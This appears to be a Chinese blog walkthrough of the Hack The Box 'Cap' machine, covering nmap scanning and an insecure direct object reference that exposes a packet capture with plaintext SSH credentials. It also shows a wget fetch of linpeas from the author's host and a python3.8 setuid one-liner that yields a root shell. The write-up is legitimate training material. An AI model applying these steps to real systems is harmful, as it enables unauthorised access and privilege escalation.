Cap

Task1

首先就是用kali自带的nmap扫描一下端口

image-20260407194119848

发现存在三个端口,ok第一题解决

image-20260407194122399

Task2

开启了80端口,访问服务,看到task2的提示是访问url会重定向

image-20260407194125618

发现会跳转到data页面

image-20260407194128415

image-20260407194131230

Test3

尝试修改最后的id值,将1改成2

image-20260407194133581

发现依旧可以访问

image-20260407194136799

Test4&5&6

利用kali自带的bp爆破一下有哪些id

image-20260407194139309

看到有4个id,查看id=0的页面,下载

image-20260407194142008

image-20260407194144881

像流量包,可以看到用户名和密码

image-20260407194147896

image-20260407194150076

UserFlag

记录一下拿到的用户名和密码

1
2
user:nathan
password:Buck3tH4TF0RM3!

因为我是在本地开的VPN直接能在本地访问,所以直接在本地进行ssh连接(如果是在kali里访问的,那就在kali连接,一样的)

1
ssh nathan@10.129.18.132

image-20260407194153105

这里看到有一个user.txt文件,查看一下,拿到第一个flag

image-20260407194156464

Test8

接下来就是要提权

先在自己的kali上起一个8080端口

1
php -S 0:8080

image-20260407194159001

这里用到一个工具linpeas

下载网址:https://github.com/peass-ng/PEASS-ng/releases

image-20260407194201378

需要利用wget将这个工具传到自己的靶机服务器上

1
2
wget http://10.10.17.116/linpeas.sh
chmod +x linpeas.sh

这个10.10.17.116是我连接上VPN之后分配到的一个ip,因为是通过这个VPN可以连上靶机,而此时两者是可以互连的,就是都可以通过一个访问的另一个

image-20260407194203630

启动工具后,找到这里的高亮提示,发现可以利用python3.8进行提权

image-20260407194206426

image-20260407194209581

RootFlag

1
python3.8 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'

命令参考文章:https://gtfobins.org/gtfobins/python/

image-20260407194212114

image-20260407194215733

渗透 > HTB
#渗透
Cap
https://colourful228.github.io/2026/03/25/Cap/
作者
Colourful
发布于
2026年3月25日
更新于
2026年4月10日
许可协议